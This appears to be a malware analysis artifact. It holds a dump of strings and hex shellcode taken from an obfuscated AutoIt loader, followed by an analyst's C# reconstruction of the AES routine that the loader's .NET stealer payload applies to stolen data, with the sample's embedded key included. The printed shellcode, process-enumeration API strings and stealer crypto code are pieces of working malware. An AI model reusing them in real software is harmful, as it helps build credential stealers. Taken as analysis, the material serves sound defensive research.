PhnSxndQSFaFpGYddKpo
Sqrt(19569)
UlIbYMD
mVtRHv
steps saw
173
4
opinions!Party!
Hurt!Cms!Shirts!
WinGetPos('oregon-Matthew-Transmission-Diagnosis-Giants-')
Perform@Manchester@Scott@
DriveGetSerial('XbLkIgoYo')
0x89C0554889C84889D54989CA4531C95756534883EC08C70100000000C741040000000045884A084183C1014983C2014181F90001000075EB488DB9000100004531D2664531C9EB3641BA0100000031F60FB658080FB6142E8D3413468D0C0E450FB6C94D63D9420FB6741908408870084883C00142885C19084839F8740E4539D07EC54963F241
83C201EBC44883C4085B5E5F5DC389DB56534883EC084585C0448B11448B49047E4E4183E8014A8D7402014183C2014181E2FF0000004963DA0FB6441908468D0C08450FB6C94D63D9460FB644190844884419084288441908418D04000FB6C00FB644010830024883C2014839F275BB448911448949044883C4085B5EC3
0x89C05531C057565383EC088B4C241C8B7C2420C70100000000C74104000000008844010883C0013D0001000075F28D910001000031DB8954240489C831D2891C2489CEEB32C704240100000031ED0FB648080FB61C2F8D2C198D5415000FB6D20FB66C160889EB88580883C001884C16083B44240474128B0C24394C24247EC58B2C2483042401EBC583C4085B5E5F5DC2100089
DB5557565383EC088B5424248B44241C8B6C242085D28B188B48047E5B31D2895C2404892C248B5C240483C30181E3FF000000895C24040FB67418088B6C24048D0C0E0FB6C90FB67C080889FB885C280889F38D343781E6FF000000885C08080FB67430088B3C2489F3301C1783C2013B54242475B089EB891889480483C4085B5E5F5DC21000
vXOAMRXYg
aeghpxJrBENhzjytT
Fxbsyu
INFANTS@SEPARATE@
LbvxiSjklShwg
ClkJhOoNxgy
HWnd('bin=Removing=Boutique=')
DriveGetSerial('wpfKNJZaSL')
89C0
cigarette*devices*strength*rat*
QvWGXDfKnFBgegLYk
kbppejVL
DriveGetSerial('iHcPSCfrozsZUWMQk')
DWi
Sqrt(15111)
CINXEp
PMtQHymXAwjPPf
dollar#Regulations#Articles#
89DB
DriveGetSerial('UIbETJLiJfZEK')
bSeoXHHgYzYVdbBv
EyponbowehBz
hwy=Bucks=Deposits=Corporation=
EXPENSES*PERMITTED*DAKOTA*
rUhumQSA
XKqBRVpllQ
fujitsu^nr^bracelet^brass^
42
VirtualAlloc
ulong_ptr
kenny/Mailing/Pf/
dame*Monitored*Investigations*Liability*
JlpgklkJrnUDYd
participant!Pregnant!Farmers!
DriveGetSerial('FuMLU')
Empire#Bubble#Argue#Alike#Unexpected#
WinGetPos('valentine exact mars pierce ')
WinGetPos('Arrival=Iso=Surrey=')
StringIsFloat('pPRawNAP')
WinGetPos('Focal Ht Yukon Coaching Soul ')
neNZEGNa
pCWtbMfMPmbr
tKkyKwCm
Centuries#Use#Drug#Query#
insurance-Vacuum-Ministry-Consensus-Northwest-
Pat=Restore=Map=Threads=
WinGetPos('MECHANISM SENSITIVITY MARKETING PSP BRIGHT ')
ozIYVaLkNlptzCuhTLR
byte[272]
DriveGetSerial('BDNuPlEvUtAR')
StringIsFloat('rCretNRcjvV')
DriveGetSerial('gdArNpZbXxwTpm')
TKLLzfEt
MKbAlUbgEwKtIOknKiK
SUuNZqV
LION+JOAN+
CallWindowProc
TTFAPJRrL
BjOUEvNcSYFFmtAPaKE
paCBRrG
StringIsFloat('RzXpuAtIFvGByQ')
your!Dressed!Arrange!Away!Light!
HWnd('Technical Talks Renaissance Programs ')
NuuHsrFoDbFFpYTPxQ
yjqctBwqkxKP
OWwsemMQyZvprcV
HERSELF=API=IDENTIFICATION=
Baghdad=Spain=Away=Grade=
guilty#coupon#outlet#adrian#signed#
WXzVHoNajMuPIIAxEyuhrWcANk
linda^composition^
HWnd('SIMPLE!HANS!JULIAN!SPAM!')
21
zjsQLVT
99
WinGetPos('EXPLAINED MILE OAKS ')
WinGetPos('Avi=Surname=Tie=March=Cartoon=')
OjlrYoaAYn
Mapping^Achieving^Comm^
Pursue#Bouquet#
WinGetPos('VARIABLES DEVELOPMENTS DISPOSITION PROTECTED PROCESS ')
BVUmItajHJNpiYZHGyFFnTgYCntPp
Rtojlztnh
WinGetPos('SERUM BRIEFS SEAT PEAK ')
Sqrt(61381)
DriveGetSerial('CshwqfQlBL')
cube!trinidad!
QBqJzFolQzhGRAyeEfUyPDGWMh
Sqrt(48609)
WinGetPos('tags#Cakes#Creative#Verify#')
POOL-ROUGHLY-ENG-MINES-
EHhFXq
NRLMQYGWpLyeHw
ihENXCkSVv
Sqrt(31134)
gym^assistance^advocate^serial^american^
StringIsFloat('JzxtKYfZsCv')
sure-jets-requests-
DriveGetSerial('gknpXvudfFSQhvg')
FcjaENeYeIwkSAdFUd
agreement-worcester-
DriveGetSerial('NDRdQcwwIRCjBXSRr')
sdAEYjb
YsmDdEOOO
WinGetPos('bill-fuzzy-aud-')
XbqA
DRxjOJTYwtcfZSvkSs
ROCHESTER+PATENT+BAGHDAD+LOTS+PENSION+
mjxYJSStTXxDhK
HWnd('yale@Compact@Descriptions@')
HWnd('Foul!Norway!')
DriveGetSerial('iZSCqszfVdHYD')
IMhabxLlKzRsE
naiLPIibd
wisconsin*phones*seat*
almost/Subjects/Besides/Sponsors/
Sqrt(51954)
QsDPGHdEBdtGddHmNXuz
aSDUrQglEMCyrAAryUigdLKQFYn
HWnd('williams!Compensation!Customs!Omega!')
xERYTqIpN
kfRZDLSzoF
Sqrt(8935)
slave=cursor=minus=advantage=name=
KdiZClFBXzTpxTfcgTKfTr
Sqrt(6554)
Hmv
COMPUTATIONAL+ZIMBABWE+PROVINCE+CLASSES+TEMPORARILY+
GjEaRj
yKFEKsTxMipKCIG
VeXuUNhBErilN
DriveGetSerial('XjpxxxFVR')
StringIsFloat('FMhhobhV')
Conflicts/Divorce/Exhibits/Cancellation/Integer/
CREATOR*PARENT*LANE*
FIWwXhE
aPlkYX
SSwklgYRC
StringIsFloat('dOmqDxpiSl')
AOCTWxKCbcbRTCCBSR
HWnd('Deficit*Assumptions*Registrar*')
StringIsFloat('FvQRBtnABrbU')
ypkEyxTHLJspL
minolta^paypal^insider^contributed^clay^
promotes fiction universe mount sex
WinGetPos('puerto/roads/ignored/')
Sqrt(36086)
Sqrt(772)
GZAPvoPfSqsLm
Thought Defeat
152
WinGetPos('Johns#A#Issues#')
zvJCWjZ
continuing^acceptance^procurement^arlington^hi^
Demand-Salad-Character-Many-Apparatus-
vcu
uVTMsXaJZw
115
activation!Must!Strings!Fortune!
EMERALD=FIORICET=ATTRACTIONS=CONSIDER=EXAMINING=
183
Sqrt(48440)
Pharmacies+Geography+Criticism+Tommy+Boulevard+
HWnd('SPIN CONSERVATION CONJUNCTION ')
dword Size;dword Usage;dword ProcessID;ulong_ptr DefaultHeapID;dword ModuleID;dword Threads;dword ParentProcessID;long PriClassBase;dword Flags;wchar ExeFile[260]
GOVERNOR=INTERIOR=BUCKS=RUGBY=REALTY=
INcKaH
RfrUyLdPElMeFfT
pIwxXByIB
WsX
CreateToolhelp32Snapshot
trinidad^nigeria^portsmouth^protein^
TRICKS=BEDROOMS=
Ref Continued Picks Whore Threshold
52
WinGetPos('phrase^Edges^Allocated^Creator^Battle^')
DbRwVmGnBMwvx
WSPwxyP
WinGetPos('jeremy/Proceeding/Shadows/Dining/')
GLORY=DATABASES=IRAQI=VBULLETIN=IDEAS=
Sqrt(46354)
scores Willow Heavily Generators Alaska
PGP!PICKS!ACADEMICS!ATI!
FUEL^LARGEST^
Saturday^Wa^Departure^Steal^
loans!buyers!syracuse!
dkGAgrEfa
HTPNPbalLDK
DRzQjcjpTT
szYlUidrqhXvVZubd
ANIMATED CELLULAR BREAKDOWN
Process32FirstW
struct*
ProcessID
DriveGetSerial('QchNwqUefZtB')
VWmJCVjqc
GcuZCYhSK
OYlqNEBNNR
Sqrt(8323)
WinGetPos('sources=arts=occasional=plates=')
heater/Museum/Omaha/
\psapi.dll
GetModuleFileNameExW
ParentProcessID
WinGetPos('presence ran finished ')
segment#bill#sticker#
clinton/Virgin/Heights/Canal/
StringIsFloat('pjGklxsHMHGNJZ')
BBBVBlNA
quhkcxRUb
Sqrt(40532)
StringIsFloat('hMgNevczYP')
DriveGetSerial('gUBxhRKED')
pHzGWgKpSVAvMQSmbe
WinGetPos('messenger+Catherine+Monitors+')
Process32NextW
commodities=quiz=seq=notified=
WinGetPos('RENDERING^ALONE^SAFELY^REMAINED^SEEKS^')
con#throat#steel#shops#
PKrICLH
JzCCOArJkkW
jbOdLHHv
pledge^Pittsburgh^Jets^Commissions^Massachusetts^
Brought+Notified+
DRAWS LICENSE AMD
Keeps^Distributed^Cut^
Specifications+Columbia+
cz*Wet*Sheep*Productions*
PSVlbtU
RjxgXUzocPyZzlytve
paACnHh
Discipline#Publisher#Crazy#Cet#
WinGetPos('lap senegal paint ')
DriveGetSerial('GAIeCTeHKMzBaK')
vXyxVAtiMtqWZ
gDGUKzckLH
DriveGetSerial('BZGDSGyvEKvKvpoa')
StringIsFloat('jcWLdzGvgTcqot')
CHANCE=TOUGH=TUNNEL=TRIUMPH=
VYpvkrJdg
CvuofNVSmSE
ZxHvtkGH
queue=miles=
uKxNuwZRtansvuVrJrEMCW
DriveGetSerial('WfcoujwMIUfEts')
miEYBy
Sign!Capable!Challenging!
ZwgUiYuSiPMhgnJzA
jXYbJO
DOgRPV
172
tUOYDssxTE
TDzzyYciagc
wt+profession+guide+
Sqrt(60541)
aFBaGtIF
gkZGoNreC
ILHpUkn
server=realize=fairly=
StringIsFloat('uHjValwAEFJ')
dexMrPDJDSZPFyV
monday+Negotiations+
PICHUNTER^BEDS^
WinGetPos('jelsoft#Began#')
uuSXyZjvBTUJYBV
HWnd('conflicts*Bb*')
mZE
HWnd('upgrading^trouble^rod^')
DriveGetSerial('iAbPHCW')
WiiJhUrWTntZqUDVY
xJuaYcGaQMSFte
Sqrt(59824)
Sqrt(2088)
Reduced@Purchases@Contribute@Lc@
Infant^Instruction^Hindu^Novelty^Sellers^
international/ft/grain/
JLgTqL
193
productivity#discover#when#faculty#
Associations#Oklahoma#Reaction#
OH-RELIEF-
DriveGetSerial('yfCrODyO')
StringIsFloat('BegMLqqikKbi')
pTQOEBhAfpcMgs
ba*Revisions*Viruses*
DriveGetSerial('RebjNNVIPEDWq')
Researchers Til Helping Vhs
Sqrt(41361)
StringIsFloat('uvXvhGyo')
DriveGetSerial('EjzjwipwTIdmtaFwt')
HWnd('XSaPSrRUlIIThEx')
LBS!SOMEBODY!VIOLATION!DIAL!BASIN!
HWnd('letting=ru=dr=co=seminar=')
DiuqxxXtpa
bZTUED
dgHbgAdJodphqh
GTudVHbraueDYm
Sqrt(38161)
australian-thinking-
Sqrt(538)
UstOOx
SScCNZbQVZgwPeLhV
KHDnFyzbGSdY
bnacKRhhmC
AFPvJdLHf
WSRJW
iJdaZvFda
HWnd('sydney!Runtime!May!Paperbacks!Extent!')
POSITIONING JAVASCRIPT VOTE CURRICULUM
gpBJVBCWN
RNhzyIOVtKHXFxiiDY
fDIdBmfGiKkl
@dr4k0nia
Author

AES encryption and decryption logic that the .NET stealer payload of the AutoIT loader applies to the stolen data.
The key is shown already decrypted and has been inserted into the function that returns it (InitKey).

using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;

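// Token: 0x02000103 RID: 259
/// <summary>
/// AES helper recovered from the decompiled .NET stealer payload; kept here so that
/// blobs produced by the sample can be decrypted during analysis.
/// </summary>
/// <remarks>
/// Blob layout: a 16-byte random IV followed by the ciphertext. Neither cipher mode nor
/// padding is set, so the defaults of <see cref="Aes.Create()"/> apply (CBC with PKCS7 in .NET).
/// The blob carries no integrity tag, so <see cref="Decrypt"/> can only detect a wrong key
/// or damaged data through a padding failure; a non-null result is not proof that the
/// plaintext is genuine.
/// Nothing in this class assigns <see cref="InitKey"/> to <see cref="Key"/>; the caller does that.
/// </remarks>
public class AesCrypto
{
	// Length in bytes of the IV that prefixes every blob.
	private const int IvSize = 16;

	// Token: 0x17000082 RID: 130
	// (get) Token: 0x06000454 RID: 1108 RVA: 0x00004D02 File Offset: 0x00002F02
	// (set) Token: 0x06000455 RID: 1109 RVA: 0x00004D0A File Offset: 0x00002F0A
	/// <summary>AES key used by <see cref="Encrypt"/> and <see cref="Decrypt"/>.</summary>
	public byte[] Key
	{
		get
		{
			return this._key;
		}
		set
		{
			this._key = value;
		}
	}

	// Token: 0x06000456 RID: 1110 RVA: 0x0002EC1C File Offset: 0x0002CE1C
	/// <summary>Encrypts a buffer under <see cref="Key"/> with a fresh random IV.</summary>
	/// <param name="byte_0">Plaintext bytes.</param>
	/// <returns>The 16-byte IV followed by the ciphertext.</returns>
	public byte[] Encrypt(byte[] byte_0)
	{
		byte[] iv = new byte[IvSize];
		// The generator is disposable; the decompiled original never released it.
		using (RandomNumberGenerator rng = RandomNumberGenerator.Create())
		{
			rng.GetBytes(iv);
		}

		using (Aes aes = Aes.Create())
		{
			aes.Key = this.Key;
			aes.IV = iv;
			using (ICryptoTransform encryptor = aes.CreateEncryptor())
			using (MemoryStream output = new MemoryStream())
			{
				// The IV goes first so that Decrypt can recover it from the blob.
				output.Write(iv, 0, iv.Length);
				using (CryptoStream cryptoStream = new CryptoStream(output, encryptor, CryptoStreamMode.Write))
				{
					cryptoStream.Write(byte_0, 0, byte_0.Length);
				}

				// The decompiled original also executed `<Module>.m = -814077312;` at this point,
				// a write to a field of the compiler-generated <Module> type (presumably
				// obfuscator state). It is not valid C# source and plays no part in the
				// encryption, so it is left out to keep the class compilable.

				// ToArray is still valid after the CryptoStream has closed the MemoryStream.
				return output.ToArray();
			}
		}
	}

	// Token: 0x06000457 RID: 1111
	/// <summary>Decrypts a blob produced by <see cref="Encrypt"/>.</summary>
	/// <param name="byte_0">The 16-byte IV followed by the ciphertext.</param>
	/// <returns>
	/// The plaintext, or <c>null</c> when the input is null, shorter than the IV, or fails
	/// to decrypt (for example a padding error caused by a wrong key).
	/// </returns>
	public byte[] Decrypt(byte[] byte_0)
	{
		try
		{
			byte[] iv = new byte[IvSize];
			// Throws for null or too-short input; the catch below turns that into null.
			Buffer.BlockCopy(byte_0, 0, iv, 0, IvSize);

			using (Aes aes = Aes.Create())
			{
				aes.Key = this.Key;
				aes.IV = iv;
				using (ICryptoTransform decryptor = aes.CreateDecryptor())
				using (MemoryStream input = new MemoryStream(byte_0, IvSize, byte_0.Length - IvSize, false))
				using (CryptoStream cryptoStream = new CryptoStream(input, decryptor, CryptoStreamMode.Read))
				using (MemoryStream plain = new MemoryStream())
				{
					// Drain the stream to its end. A single Read call may return fewer bytes
					// than requested (CryptoStream does so on .NET 6 and later), which
					// silently truncated the plaintext in the decompiled version.
					cryptoStream.CopyTo(plain);
					return plain.ToArray();
				}
			}
		}
		catch (Exception)
		{
			// Best-effort contract of the original: any failure is reported as null.
			return null;
		}
	}

	// Token: 0x06000458 RID: 1112 RVA: 0x0002EE14 File Offset: 0x0002D014
	/// <summary>Returns the key embedded in the sample.</summary>
	/// <returns>
	/// The 32 bytes decoded from the Base64 literal (an AES-256 key), or <c>null</c> if the
	/// literal cannot be decoded.
	/// </returns>
	public static byte[] InitKey()
	{
		try
		{
			// Fixed key for this sample: it is the same for every blob the sample produces.
			return Convert.FromBase64String("p8Ga5rmzt0SWaIMgO1D9P2eA/on1sj+MugV7SZOjq/c=");
		}
		catch (FormatException)
		{
			return null;
		}
	}

	// Token: 0x04000468 RID: 1128
	private byte[] _key;
}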
